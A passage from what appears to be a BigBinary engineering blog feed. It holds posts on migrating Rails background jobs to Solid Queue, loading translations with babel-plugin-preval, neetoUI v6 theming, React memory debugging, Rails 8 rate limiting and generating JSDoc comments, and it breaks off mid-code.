<code>ApplicationJob</code>.</p><h2>7. Testing</h2><p>Once all the above changes were done, it was obvious that a lot of tests werefailing. Apart from fixing the usual failures related to the syntax changes,some of the tests were failing inconsistently. On debugging, we found that theaffected tests were all related to controllers, specifically tests inheritingfrom <code>ActionDispatch::IntegrationTest</code>.</p><p>We tried debugging and searched for solutions when we stumbled upon<a href="https://github.com/bensheldon">Ben Sheldon's</a><a href="https://github.com/bensheldon/good_job/issues/846#issuecomment-1432375562">comment on one of Good Job's issues</a>.Ben points out that this is actually<a href="https://github.com/rails/rails/issues/37270">an issue in Rails</a> where Railssometimes inconsistently overrides ActiveJob's queue_adapter setting withTestAdapter. A <a href="https://github.com/rails/rails/pull/48585">PR is already open</a>for the fix. Thankfully, Ben, in the same comment, also mentioned a workaroundfor it until the fix has been added to Rails.</p><p>We added the workaround in our test <code>helper_methods.rb</code> and called the method ineach of our controller tests which were failing.</p><pre><code class="language-ruby"># test/support/helper_methods.rbdef ensure_consistent_test_adapter_is_used  # This is a hack mentioned here: https://github.com/bensheldon/good_job/issues/846#issuecomment-1432375562  # The actual issue is in Rails for which a PR is pending merge  # https://github.com/rails/rails/pull/48585  (ActiveJob::Base.descendants + [ActiveJob::Base]).each(&amp;:disable_test_adapter)end</code></pre><pre><code class="language-ruby"># test/controllers/exports_controller_test.rbclass ExportsControllerTest &lt; ActionDispatch::IntegrationTest  def setup    ensure_consistent_test_adapter_is_used    # ...  end  # ...end</code></pre><h2>8. Monitoring</h2><p>Basecamp has released<a href="https://github.com/basecamp/mission_control-jobs">mission_control-jobs</a>, whichcan be used to monitor background jobs. It is generic, so it can be used withany compatible ActiveJob adapter.</p><p>Add <code>gem &quot;mission_control-jobs&quot;</code> to your Gemfile and run <code>bundle install</code>.</p><p>Mount the mission control route in your <code>routes.rb</code> file.</p><pre><code class="language-ruby"># routes.rbRails.application.routes.draw do  # ...  mount MissionControl::Jobs::Engine, at: &quot;/jobs&quot;</code></pre><p>By default, mission control would try to load the adapter specified in your<code>application.rb</code> or individual environment-specific files. Currently, Sidekiqisn't compatible with mission control, so you will face an error while loadingthe dashboard at <code>/jobs</code>. The fix is to explicitly specify <code>solid_queue</code> to thelist of mission control adapters.</p><pre><code class="language-ruby"># application.rb# ...config.mission_control.jobs.adapters = [:solid_queue]</code></pre><p>Now, visiting <code>/jobs</code> on your site should load a dashboard where you can monitoryour Solid Queue jobs.</p><p>But that isn't enough. There is no authentication. For development environments,it is fine, but the <code>/jobs</code> route would be exposed on production too. Bydefault, Mission Control's controllers will extend the host app's<code>ApplicationController</code>. If no authentication is enforced, <code>/jobs</code> will beavailable to everyone.</p><p>To implement some kind of authentication, we can specify a different controlleras the base class for Mission Control's controllers and add the authenticationthere.</p><pre><code class="language-ruby"># application.rb# ...MissionControl::Jobs.base_controller_class = &quot;MissionControlController&quot;</code></pre><pre><code class="language-ruby"># app/controllers/mission_control_controller.rbclass MissionControlController &lt; ApplicationController  before_action :authenticate!, if: :restricted_env?  private    def authenticate!      authenticate_or_request_with_http_basic do |username, password|        username == &quot;solidqueue&quot; &amp;&amp; password == Rails.application.secrets.mission_control_password      end    end    def restricted_env?      Rails.env.staging? || Rails.env.production?    endend</code></pre><p>Here, we have specified that <code>MissionControlController</code> would be our basecontroller for mission control related controllers. Then in<code>MissionControlController</code> we implemented basic authentication for staging andproduction environments.</p><h2>Observations</h2><p>We haven't had any complaints so far. Solid Queue offers simplicity, requires noadditional infrastructure and provides visibility for managing jobs since theyare stored in the database.</p><p>In the coming days, we will migrate all of our 22 Neeto products to Solid Queue.And once cron-style job support lands in Solid Queue, we will completely migratefrom Sidekiq.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Streamlining translation resource loading in React apps with babel-plugin-preval]]></title>
       <author><name>Mohit Harshan</name></author>
      <link href="https://www.bigbinary.com/blog/simplifying-loading-translation-resources-using-babel-plugin-preval"/>
      <updated>2024-02-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/simplifying-loading-translation-resources-using-babel-plugin-preval</id>
      <content type="html"><![CDATA[<p>At Neeto, our product development involves reusing common components, utilities,and initializers across various projects. To maintain a cohesive andstandardized codebase, we've created specialized packages, or &quot;<code>nanos</code>&quot; such as<code>neeto-commons-frontend</code>, <code>neeto-fields-nano</code>, and <code>neeto-team-members-nano</code>.</p><p><code>neeto-commons-frontend</code> houses utility functions, components, hooks,configuration settings, etc. <code>neeto-fields-nano</code> manages dynamic fieldcomponents, while <code>neeto-team-members-nano</code> handles team member managementfunctionalities.</p><p>These <code>nanos</code>, along with others, reduce redundancy and promote consistencyacross our products.</p><h2>Translation Challenges</h2><p>Many of our packages export components with text that requires internalization,maintaining their own translation files. We encountered an issue with the<code>withT</code> higher-order component (HOC) using <code>react-i18next</code> inside<code>neeto-commons-frontend</code>. Upon investigation, we found discrepancies in howpackages handled dependencies.</p><p><code>withT</code> is an HOC which provides the <code>t</code> function from <code>react-i18next</code> to thewrapped component as a prop.</p><pre><code class="language-js">import { withTranslation } from &quot;react-i18next&quot;;const withT = (Component, options, namespace = undefined) =&gt;  withTranslation(namespace, options)(Component);export default withT;</code></pre><pre><code class="language-jsx">// Example usage of withT:const ComponentWithTranslation = withT(({ t }) =&gt; &lt;div&gt;{t(&quot;some.key&quot;)}&lt;/div&gt;);</code></pre><p>Let us first understand the difference between <code>dependencies</code> and<code>peerDependencies</code>. <code>dependencies</code> are external packages a library relies on,automatically installed with the library. <code>peerDependencies</code> suggest that usersshould explicitly install these dependencies in their application if they wantto use this library. If not installed, we will get warnings during installationof this library to prompt us to install the peer dependencies.</p><p><code>react-i18next</code> and <code>i18next</code> were listed as <code>peerDependencies</code> in<code>neeto-commons-frontend</code>'s <code>package.json</code>. So, it will be using the instances ofthese libraries from the host application.</p><p>Examining <code>neeto-fields-nano</code>, we found that it listed <code>react-i18next</code> and<code>i18next</code> as <code>dependencies</code> rather than <code>peerDependencies</code>. This meant it hadits own instances of these libraries, leading to initialization discrepancies.</p><p>Contrastingly, <code>neeto-team-members-frontend</code> listed <code>react-i18next</code> and<code>i18next</code> as <code>peerDependencies</code>, relying on the host application'sinitialization of these libraries.</p><p>The initialization logic, which is common among all the products, is placedinside <code>neeto-commons-frontend</code>. To ensure translations from all packages,including <code>neeto-commons-frontend</code> are merged with that of the host application,we crafted a custom <code>initializeI18n</code> function:</p><pre><code class="language-js">import DOMPurify from &quot;dompurify&quot;;import i18n from &quot;i18next&quot;;import { curry, mergeAll, mergeDeepLeft } from &quot;ramda&quot;;import { initReactI18next } from &quot;react-i18next&quot;;import commonsEn from &quot;../translations/en.json&quot;;const packageNames = [  &quot;neeto-molecules&quot;,  &quot;neeto-integrations-frontend&quot;,  &quot;neeto-team-members-frontend&quot;,  &quot;neeto-tags-frontend&quot;,];const getPackageTranslations = (language, packageNames) =&gt; {  const loadTranslations = curry((language, packageName) =&gt; {    try {      return require(`../${packageName}/src/translations/${language}.json`);    } catch {      return {};    }  });  const allTranslations = packageNames.map(loadTranslations(language));  return mergeAll(allTranslations);};const packageEnTranslations = getPackageTranslations(&quot;en&quot;, packageNames);const en = mergeDeepLeft(commonsEn, packageEnTranslations);const initializeI18n = resources =&gt; {  i18n.use(initReactI18next).init({    resources: mergeDeepLeft(resources, { en: { translation: en } }),    lng: &quot;en&quot;,    fallbackLng: &quot;en&quot;,    interpolation: { escapeValue: false, skipOnVariables: false },  });};export default initializeI18n;</code></pre><p>Here we are looping through all the packages mentioned in <code>packageNames</code> andmerging with the translation keys inside <code>neeto-commons-frontend</code>, along withthe translation keys from the host app are passed as an argument to <code>initializeI18n</code>function.</p><p>While this approach successfully merges translations, it introduced complexity.As our project expanded with the inclusion of more packages, we found the needto regularly update the <code>neeto-commons-frontend</code> code, manually adding newpackages to the <code>packageNames</code> array. This prompted us to seek an automatedsolution to streamline this process.</p><p>Given that all our packages are under the <code>@bigbinary</code> namespace in <code>npm</code>, weexplored the possibility of dynamically handling this. An initial thought was toiterate through packages under <code>node_modules/@bigbinary</code> and merge theirtranslation keys. However, executing this in the browser was not possible sincethe browser does not have access to its build environment's file system.</p><h2>Enter babel-plugin-preval:</h2><p>To automate our translation aggregation process, we turned to<a href="https://www.npmjs.com/package/babel-plugin-preval"><code>babel-plugin-preval</code></a>. Thisplugin allows us to execute dynamic tasks during build time.</p><p><code>babel-plugin-preval</code> allows us to specify some code that runs in <code>Node</code> andwhatever we <code>module.exports</code> in there will be swapped.</p><p>Let us look at an example:</p><pre><code class="language-js">const x = preval`module.exports = 1`;</code></pre><p>will be transpiled to:</p><pre><code class="language-js">const x = 1;</code></pre><p>With <code>preval.require</code>, the following code:</p><pre><code class="language-js">const fileLastModifiedDate = preval.require(&quot;./get-last-modified-date&quot;);</code></pre><p>will be transpiled to:</p><pre><code class="language-js">const fileLastModifiedDate = &quot;2018-07-05&quot;;</code></pre><p>Here is the content of <code>get-last-modified-date.js</code>:</p><pre><code class="language-js">module.exports = &quot;2018-07-05&quot;;</code></pre><p>Here, the <code>2018-07-05</code> date is read from the file and replaced in the code.</p><p>In order to use this plugin we just need to install it and add <code>preval</code> to the<code>plugins</code> array in <code>.babelrc</code> or <code>.babel.config.js</code></p><h2>Streamlining Translations with preval:</h2><p>We revamped the <code>initializeI18n</code> function using <code>preval.require</code> to dynamicallyfetch translations from all <code>@bigbinary</code>-namespaced packages. This eliminatedthe need for manual updates in <code>neeto-commons-frontend</code> whenever a new packagewas added.</p><p>With preval, our <code>initializeI18n</code> function was refactored as follows:</p><pre><code class="language-js">const initializeI18n = hostTranslations =&gt; {  // eslint-disable-next-line no-undef  const packageTranslations = preval.require(    &quot;../configs/scripts/getPkgTranslations.js&quot;  );  const commonsTranslations = { en: { translation: commonsEn } };  const resources = [    hostTranslations,    commonsTranslations,    packageTranslations,  ].reduce(mergeDeepLeft);};</code></pre><p>The code for <code>getPackageTranslations.js</code>:</p><pre><code class="language-js">const fs = require(&quot;fs&quot;);const path = require(&quot;path&quot;);const { mergeDeepLeft } = require(&quot;ramda&quot;);const packageDir = path.join(__dirname, &quot;../../&quot;);const getPkgTransPath = pkg =&gt; {  const basePath = path.join(packageDir, pkg);  const transPath1 = path.join(basePath, &quot;app/javascript/src/translations&quot;);  const transPath2 = path.join(basePath, &quot;src/translations&quot;);  return fs.existsSync(transPath1) ? transPath1 : transPath2;};const packages = fs.readdirSync(packageDir);const loadTranslations = translationsDir =&gt; {  try {    const jsonFiles = fs      .readdirSync(translationsDir)      .filter(file =&gt; file.endsWith(&quot;.json&quot;))      .map(file =&gt; path.join(translationsDir, file));    const translations = {};    jsonFiles.forEach(jsonFile =&gt; {      const content = fs.readFileSync(jsonFile, &quot;utf8&quot;);      const basename = path.basename(jsonFile, &quot;.json&quot;);      translations[basename] = { translation: JSON.parse(content) };    });    return translations;  } catch {    return {};  }};const packageTranslations = packages  .map(pkg =&gt; loadTranslations(getPkgTransPath(pkg)))  .reduce(mergeDeepLeft);module.exports = packageTranslations;</code></pre><p>In this workflow, we iterate through all the packages to retrieve theirtranslation files and subsequently merge them. We are able to access thetranslation files of our packages since we have exposed those files in the<code>package.json</code> of all our packages.</p><p><code>files</code> property in <code>package.json</code> is an allowlist of all files that should beincluded in an <code>npm</code> release.</p><p>Inside <code>package.json</code> of our nanos, we have added the translations folder to the<code>files</code> property:</p><pre><code class="language-js">{  // other properties  files: [&quot;app/javascript/src/translations&quot;];}</code></pre><p>It's worth noting that we won't run <code>preval</code> at the time of bundling<code>neeto-commons-frontend</code>. Our objective is to merge the translation keys of allinstalled dependencies of the host project with those of the host projectitself. Since <code>neeto-commons-frontend</code> is one of the dependencies of the hostprojects, executing preval within <code>neeto-commons-frontend</code> is not what weneeded.</p><p>Consequently, we've manually excluded the <code>preval</code> plugin from the Babelconfiguration specific to <code>neeto-commons-frontend</code>:</p><pre><code class="language-js">module.exports = function (api) {  const config = defaultConfigurations(api);  config.plugins = config.plugins.filter(plugin =&gt; plugin !== &quot;preval&quot;);  config.sourceMaps = true;};</code></pre><p>With this change, the Babel compiler simply skips the code for <code>preval</code> duringbuild time and the <code>preval</code> related code will be kept as it is after compilationfor <code>neeto-commons-frontend</code>.</p><p>Another challenge arises from the default behavior of <code>webpack</code>, which does nottranspile the <code>node_modules</code> folder by default. However, it's necessary for ourhost application to perform this transpilation. To address this, we wrote acustom rule for <code>webpack</code>. The webpack rules are also placed in<code>neeto-commons-frontend</code> and shared across all the products.</p><pre><code class="language-js">  {    test: /\.js$/,    include:      /node_modules\/@bigbinary\/neeto-commons-frontend\/initializers\/i18n/,    use: { loader: &quot;babel-loader&quot;, options: { plugins: [&quot;preval&quot;] } },  },</code></pre><p>This configuration ensures that Babel applies the necessary transformations tothe code located in<code>node_modules/@bigbinary/neeto-commons-frontend/initializers/i18n/</code> within thehost application.</p><p>Upon transpilation, our system consolidates all translations from each package,including those from the <code>neeto-commons-frontend</code> package, and incorporates theminto the host application.</p><p>To mitigate potential conflicts arising from overlapping keys, we've implementeda namespacing strategy for translations originating from various packages. Thisensures that translations from our packages carry a distinctive key, uniquelyidentifying their source.</p><p>For example, consider the <code>neeto-filters-nano</code> package. In its Englishtranslation file (en.json), the translations are organized within a dedicatednamespace:</p><pre><code class="language-json">neetoFilters: {    &quot;common&quot;: { }}</code></pre><h2>Conclusion:</h2><p>Leveraging <code>babel-plugin-preval</code> significantly simplified our translationresource loading process. The automation introduced not only streamlined ourworkflow but also ensured that our applications stay consistent and easilyadaptable to future package additions.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Introducing neetoUI v6]]></title>
       <author><name>Goutham Subramanyam</name></author>
      <link href="https://www.bigbinary.com/blog/introducing-neeto-ui-v6"/>
      <updated>2024-02-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/introducing-neeto-ui-v6</id>
      <content type="html"><![CDATA[<h3>Introduction</h3><p><a href="https://neeto-ui.neeto.com/">NeetoUI</a> is an open-source React component librarydeveloped for <a href="https://www.neeto.com/">neeto</a>. It makes it easier to buildaccessible and consistent UI in React applications. It is currently being usedin more than 20 Neeto products. In this blog post, we will explore the excitingnew features and enhancements of neetoUI.</p><h3>The Spark</h3><p>Though we were using neetoUI across all our products, we had to avoid neetoUI incertain products that followed a different UI style. For example,<a href="https://neetocode.com/">NeetoCode</a>, a coding platform built by BigBinary, hasits own special design that is drastically different from the establishedneetoUI style. So, while building the new landing page for NeetoCode, we alsohad to create custom buttons and form elements that followed the NeetoCodedesign.</p><p>Secondly, neetoUI only supported theme overrides. This means the users couldeasily override the color scheme of neetoUI just by replacing the colorvariables. But with NeetoCode, just updating the theme was not enough. Frombutton sizing to border radius and variants, every component was different inthe NeetoCode design system. That's when we realized that neetoUI requires evenmore customization options to improve its adaptability.</p><h3>The Solution</h3><p>To enhance the customizability of neetoUI, we planned to implement a set ofcustomization features similar to popular design systems like<a href="https://getbootstrap.com/docs/5.3/customize/overview/">Bootstrap</a> and<a href="https://ant.design/docs/react/customize-theme">Ant design</a>. These featureswould allow users to adapt the library to their unique design withoutcompromising on the core advantages of using neetoUI. Apart from the colortheming which neetoUI already supported, we also wanted to introduce componentstyling and responsive typography to further advance the customizability ofneetoUI.</p><h3>The Execution</h3><p>NeetoUI has more than 30+ components, and enhancing the customizability of thosecomponents was not an easy task. We approached each component one by one andrefactored the respective styles to use CSS variables for all the properties.</p><p>Lets take the example of the <code>Button</code> component from neetoUI. Earlie,r we couldonly customize the colors used in the buttons. But with v6, we have made everyaspect of the button, like padding, border-radius, font size, etc. customizable.</p><p>Here is the list of variables used by the <code>Button</code> component.</p><p><strong>CSS</strong></p><pre><code class="language-css">--neeto-ui-btn-padding-x: 8px;--neeto-ui-btn-padding-y: 6px;--neeto-ui-btn-font-size: var(--neeto-ui-text-sm);--neeto-ui-btn-font-weight: var(--neeto-ui-font-medium);--neeto-ui-btn-line-height: 16px;--neeto-ui-btn-color: rgb(var(--neeto-ui-black));--neeto-ui-btn-bg-color: transparent;--neeto-ui-btn-border-width: 0;--neeto-ui-btn-border-color: transparent;--neeto-ui-btn-border-radius: var(--neeto-ui-rounded);--neeto-ui-btn-gap: 4px;--neeto-ui-btn-icon-size: 16px;--neeto-ui-btn-box-shadow: none;--neeto-ui-btn-outline: none;// Disabled--neeto-ui-btn-disabled-opacity: 0.5;// Hover--neeto-ui-btn-hover-color: rgb(var(--neeto-ui-black));--neeto-ui-btn-hover-bg-color: transparent;--neeto-ui-btn-hover-box-shadow: none;--neeto-ui-btn-hover-opacity: 1;// Focus--neeto-ui-btn-focus-color: rgb(var(--neeto-ui-black));--neeto-ui-btn-focus-box-shadow: none;--neeto-ui-btn-focus-opacity: 1;// Focus Visible--neeto-ui-btn-focus-visible-color: rgb(var(--neeto-ui-black));--neeto-ui-btn-focus-visible-outline: 3px solid rgba(var(--neeto-ui-primary-500), 50%);--neeto-ui-btn-focus-visible-outline-offset: 1px;--neeto-ui-btn-focus-visible-box-shadow: none;</code></pre><p>The users can now tweak each property of the Button component using thesevariables and create their version of the component. You can see it in action,<a href="https://n53f9m.csb.app/">here</a>.</p><p><img src="/blog_images/2024/introducing-neeto-ui-v6/button-customization-example.png" alt="Button customization examples"></p><p><a href="https://codesandbox.io/embed/n53f9m?view=Editor+%2B+Preview&amp;module=%2Fsrc%2Fstyles.scss&amp;hidenavigation=1"><img src="https://codesandbox.io/static/img/play-codesandbox.svg" alt="Edit in CodeSandbox"></a></p><p>Likewise, we have updated all the components and the new<a href="https://neeto-ui.neeto.com/">neetoUI storybook</a> has examples on how to overrideeach component.</p><h3>The Result</h3><p>With all the customization improvements, neetoUI v6 has been released to thepublic. Just by changing a few CSS variables, you can now change the look andfeel of neetoUI at both the global and component levels to match your exactdesign requirements.</p><p><img src="/blog_images/2024/introducing-neeto-ui-v6/neeto-ui-v6-customization.gif" alt="Button customization examples"></p><p>Do visit this <a href="https://mlxvmt.csb.app/">page</a> to understand the nuances ofneetoUI v6 up close.</p><p>We hope you have a clearer understanding of the improvements we have made to thelibrary. Do try it out and let us know your feedback.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Debugging memory issues in ReactJS applications]]></title>
       <author><name>Calvin Chiramal</name></author>
      <link href="https://www.bigbinary.com/blog/debugging-memory-issues-in-react-applications"/>
      <updated>2024-02-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/debugging-memory-issues-in-react-applications</id>
      <content type="html"><![CDATA[<p>Memory leaks can occur when resources allocated for a particular task have notbeen released after the task is finished. This leads to the accumulation ofmemory until applications do not have enough for the required tasks. In React,memory leaks can occur due to a multitude of reasons.</p><ul><li>Components are not unmounted properly.</li><li>Event listeners are not cleared after use.</li><li>Unnecessary data stored in the state as well as not resetting the state.</li></ul><p>This video shows how we can use the memory tab in Chrome Developer Tools to testour application for memory leaks.</p><p><em>The following video was made for internal use at BigBinary. The video is beingpresented &quot;as it was recorded&quot;.</em></p><p>&lt;iframewidth=&quot;966&quot;height=&quot;604&quot;src=&quot;https://www.youtube.com/embed/pdJDIySfyLM&quot;title=&quot;Debugging NeetoTestify's memory leak&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 8 introduces a built-in rate limiting API]]></title>
       <author><name>Yedhin Kizhakkethara</name></author>
      <link href="https://www.bigbinary.com/blog/rails-8-rate-limiting-api"/>
      <updated>2024-02-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-8-rate-limiting-api</id>
      <content type="html"><![CDATA[<p>In the dynamic world of web development, managing the flow of requests iscrucial for maintaining a responsive and reliable application. Rate limiting isa powerful technique that acts as the traffic cop for your API, ensuring fairaccess to resources and preventing potential chaos. In a nutshell, rate limitingis the practice of controlling the rate of requests a user, device, orapplication can make within a set timeframe.</p><p>In this blog post, we'll delve into the concept of rate limiting, exploring itssignificance and implementation in Rails 8.0.</p><h2>The Need for Rate Limiting</h2><p>It's crucial in ensuring the following:</p><ul><li>Security Shield: Guards against Denial-of-Service (DoS) attacks, thwartingmalicious attempts to flood your app and crash it.</li><li>Resource Balance: Prevents resource abuse by capping heavy users, ensuringfair resource distribution and maintaining optimal app performance.</li><li>Brute-Force Defender: Stalls hackers attempting password guesses or exploitingvulnerabilities through relentless, repeated attempts.</li></ul><h2>How Rack::Attack Paved the Way</h2><p>In the pre-Rails 8.0 era, the go-to solution for rate limiting was the<a href="https://github.com/rack/rack-attack"><code>rack-attack</code></a> gem. This gem alloweddevelopers to set up rate-limiting rules by adding custom code in the<code>rack_attack.rb</code> file. While effective, this approach required manualintervention for each endpoint and could become cumbersome in a growingapplication. This external dependency brought its own set of challenges, such asthe need for custom code and constant vigilance over rate-limited endpoints.</p><h2>Rails 8.0: Native Rate Limiting</h2><p>Rails 8.0 brings a native rate-limiting feature to the Action Controller,streamlining the process and eliminating the need for external gems. Developerscan now set rate limits directly within their controllers using the <code>rate_limit</code>method.</p><p>Let's take a look at the usage:</p><h3>Define Limits</h3><p>Utilize the <code>rate_limit</code> method within your controller actions, specifying themaximum allowed requests and the corresponding timeframe. The <code>rate_limit</code>method accepts the following parameters:</p><ul><li><code>to</code>: The maximum number of requests allowed, beyond which the rate limitingerror will be raised, that is with a <strong>429 Too Many Requests</strong> response.</li><li><code>within</code>: The maximum number of requests allowed in a given time window.</li><li><code>only</code>: Which all controller actions ought to be rate limited.</li><li><code>except</code>: Which all controller actions to be omitted from rate limiting.</li></ul><p>An example:</p><pre><code class="language-rb">class SignupController &lt; ApplicationController  rate_limit to: 4, within: 1.minute, only: :create  def create    # ...  endend</code></pre><h3>Granular Control</h3><p>Target specific actions or employ custom logic for nuanced control. Forinstance, you can limit requests based on domain instead of IP address.</p><pre><code class="language-rb">rate_limit to: 4, within: 1.minute, by: -&gt; { request.domain }, only: :create</code></pre><h3>Tailored Responses</h3><p>By default, rate-limited requests receive a <code>429 Too Many Requests</code> error.However, you can personalize the response for a more informative userexperience.</p><pre><code class="language-rb">rate_limit to: 4, within: 1.minute, with: -&gt; { redirect_to(ip_restrictions_controller_url), alert: &quot;Signup Attempts failed four times. Please try again later.&quot; }, only: :create</code></pre><h2>Custom Cache Stores</h2><p>The Rails 8.0 rate-limiting implementation at the moment allows us to make use awide range of backends as its store.</p><p>It includes:</p><ul><li>Memcached</li><li>Redis (including alternative Redis clients like Dalli)</li><li>Database-backed stores</li><li>File-based stores</li></ul><p>The Rate Limiting API seamlessly integrates with Rails' caching mechanisms,leveraging<a href="https://api.rubyonrails.org/classes/ActiveSupport/Cache.html"><code>ActiveSupport::Cache</code></a>stores. Developers can specify custom cache stores if they require separatehandling for rate limits compared to other cache data. This integration ensuresefficient storage and retrieval of rate limit data, optimizing performance. Anexample:</p><pre><code class="language-rb">class SignupController &lt; ApplicationController  RATE_LIMIT_STORE = ActiveSupport::Cache::RedisCacheStore.new(url: ENV[&quot;REDIS_URL&quot;])  rate_limit to: 8, within: 2.minutes, store: RATE_LIMIT_STOREend</code></pre><h2>What to look forward to</h2><p>At the moment the built-in rate limiting feature is limited in itsextensibility. There are cases where this feature cannot be used as a directreplacement for logic that's based on <code>rack-attack</code> gem. A good example is ascenario where we might want to use an exponential backoff based rate limitingalgorithm, which can be implemented using <code>rack-attack</code> gem but not with thebuilt-in Rails feature at the moment.</p><p>Right now, we are constrained to stick to the default cache counter algorithmthat Rails comes shipped with. In the future, we can expect a more generic limiterinterface, allowing users to explore advanced rate-limiting algorithms such asexponential backoff, leaky bucket, or token bucket, etc. This change would openthe door for developers to swap the implementation based on their specificrequirements.</p><p>Please check out the following pull requests for more details:</p><ul><li>https://github.com/rails/rails/pull/50490</li><li>https://github.com/rails/rails/pull/50781</li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Embracing Type Definitions and JSDoc Comments in JS packages]]></title>
       <author><name>Ajmal Noushad</name></author>
      <link href="https://www.bigbinary.com/blog/jsdoc-generation"/>
      <updated>2024-02-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jsdoc-generation</id>
      <content type="html"><![CDATA[<p>At BigBinary, we decided to experiment with type definitions and JSDoc commentsto see if using these tools improves how we interact with JavaScript packages.</p><h2>Why Type Definitions</h2><p>We considered using TypeScript. However, in the end, we opted against it sincemost of our clients use plain JavaScript. Still, we added type definitions forour JavaScript packages to:</p><ul><li><strong>Reduce Ambiguity and Improved Clarity</strong>: Type definitions shed light on theexpected input and output of functions and components, eliminating ambiguityand allowing developers to understand the code without needing to constantlyrefer to separate documentation.</li><li><strong>Enhance Productivity and Efficiency</strong>: By providing clear insights into thestructure of our libraries, including information about arguments, props, anddata types, type definitions significantly boost developer productivity andfacilitate efficient coding practices.</li><li><strong>Seamless Code Editor Integration</strong>: Popular editors like VSCode leveragetype definitions to offer powerful features like<a href="https://code.visualstudio.com/docs/editor/intellisense">IntelliSense</a>,further streamlining the development process and minimizing errors.</li></ul><h2>Unifying Documentation with JSDoc Comments</h2><p>Although type definitions offered a valuable structural understanding,comprehensive documentation remained a challenge. Here is a typical example ofour documentation of an exported function inside a Markdown file:</p><p><img src="/blog_images/2024/jsdoc-generation/documentation.png" alt="Documentation"></p><p>Navigating between code and Markdown files scattered across the packagerepository was cumbersome and time-consuming.</p><p>To address this pain point, we incorporated JSDoc comments alongside typedefinitions. This allowed us to:</p><ul><li><strong>Consolidate Essential Documentation</strong>: Instead of relying on separate files,we embedded detailed usage instructions, examples, and additional informationdirectly within the JSDoc comments, providing developers with readilyavailable context within their IDE environment.</li><li><strong>Improve Accessibility and Transparency</strong>: By integrating documentation withthe code itself, JSDoc comments eliminate the need for context switching andoffer immediate access to critical information, enhancing the developerunderstanding and decision-making.</li></ul><h2>Optimizing Documentation Workflow</h2><p>Maintaining two separate documentation sets  Markdown files and JSDoc comments proved inefficient. To ensure consistency and to eliminate redundancy, weautomated the generation of JSDoc comments from existing Markdown documentation.</p><p>This involved:</p><ul><li><strong>Standardization for Efficiency</strong>: We implemented a standardized structureand format for the Markdown documentation, facilitating easier readability fora developer as well as parsing for an automated parser.</li><li><strong>Building a Custom Script</strong>: A dedicated script was developed to parse theMarkdown files, extract relevant documentation for each function or component,and automatically prepend it to the corresponding type definitions.</li><li><strong>Integration with Build Process</strong>: To ensure automatic updates and maintain asingle source of truth, we integrated the JSDoc generation script into thepackage build process, seamlessly generating up-to-date documentationalongside the code itself.</li></ul><p>Below snippet shows a minimized version of the JSdoc generation script:</p><pre><code class="language-js">import fs from &quot;fs&quot;;import path from &quot;path&quot;;import _generate from &quot;@babel/generator&quot;;import _traverse from &quot;@babel/traverse&quot;;import * as babelTypes from &quot;@babel/types&quot;;const traverse = _traverse.default;const generate = _generate.default;const buildJsdoc = () =&gt; {  const fileNamesInsideDocs = getFileNameList(path.resolve(DOCS_FOLDER_NAME));  const typeFileNames = fs.readdirSync(path.resolve(TYPES_FOLDER_NAME));  syncTypeFiles(EXPORTED_TYPES_FOLDER_NAME);  const entityTitleToDescMapOfAllFiles = {};  fileNamesInsideDocs.forEach(docFileName =&gt; {    const fileContent = getFileContent(docFileName);    const markdownAST = parseMarkdown(fileContent);    buildEntityTitleToEntityDescMap(      markdownAST.children,      entityTitleToDescMapOfAllFiles    );  });  typeFileNames.forEach(typeFileName =&gt; {    const typeFileContent = getFileContent(      path.join(EXPORTED_TYPES_FOLDER_NAME, typeFileName)    );    const typeFileAST = parseTypeFile(typeFileContent);    typeFileTraverser({      typeFileName: `${EXPORTED_TYPES_FOLDER_NAME}/${typeFileName}`,      typeFileAST,      entityTitleToDescMapOfAllFiles,      babelTraverse: traverse,      babelCodeGenerator: generate,      babelTypes,    });  });  console.log(&quot;Successfully added JSDoc comments to type files.&quot;);};</code></pre><p>Let's dive deep into the above snippet to understand how the JSDoc generationscript works.</p><h3>Initial Setup and Imports</h3><p>The script starts with essential imports and variable initializations. Thissection sets up the necessary tools and libraries to work with file systems andAbstract Syntax Trees (AST).</p><pre><code class="language-js">import fs from &quot;fs&quot;;import path from &quot;path&quot;;import _generate from &quot;@babel/generator&quot;;import _traverse from &quot;@babel/traverse&quot;;import * as babelTypes from &quot;@babel/types&quot;;const traverse = _traverse.default;const generate = _generate.default;</code></pre><h4>Gathering File Information</h4><p>We created a <code>buildJsdoc</code> function to encapsulate the JSDoc generation process.The <code>buildJsdoc</code> function begins by collecting file names from the documentation(<code>DOCS_FOLDER_NAME</code>) and type definitions (<code>TYPES_FOLDER_NAME</code>) folders. It thencopies the type definition files to the <code>EXPORTED_TYPES_FOLDER_NAME</code>.</p><pre><code class="language-js">const fileNamesInsideDocs = getFileNameList(path.resolve(DOCS_FOLDER_NAME));const typeFileNames = fs.readdirSync(path.resolve(TYPES_FOLDER_NAME));syncTypeFiles(EXPORTED_TYPES_FOLDER_NAME); // copying the files</code></pre><h4>Building Entity Descriptions Map</h4><p>The script parses Markdown documentation files to construct a map linking entitytitles to their descriptions. This map serves as a bridge between thedocumentation and the type definitions. We use <code>unified</code> package and<code>remarkParse</code> plugin for parsing Markdown.</p><pre><code class="language-js">const entityTitleToDescMapOfAllFiles = {};fileNamesInsideDocs.forEach(docFileName =&gt; {  const fileContent = getFileContent(docFileName);  const markdownAST = parseMarkdown(fileContent);  buildEntityTitleToEntityDescMap(    markdownAST.children,    entityTitleToDescMapOfAllFiles  );});</code></pre><h4>Updating Type Definitions</h4><p>Next, the script traverses the AST of each type definition file. For eachentity, it finds the corresponding description from the map and adds it to thetype definition file. The <code>typeFileTraverser</code> function is responsible fortraversing the AST of a type definition file and looks for<code>ExportNamedDeclaration</code> nodes. It then prepends the corresponding JSDoc commentto the node.</p><pre><code class="language-js">typeFileNames.forEach(typeFileName =&gt; {  const typeFileContent = 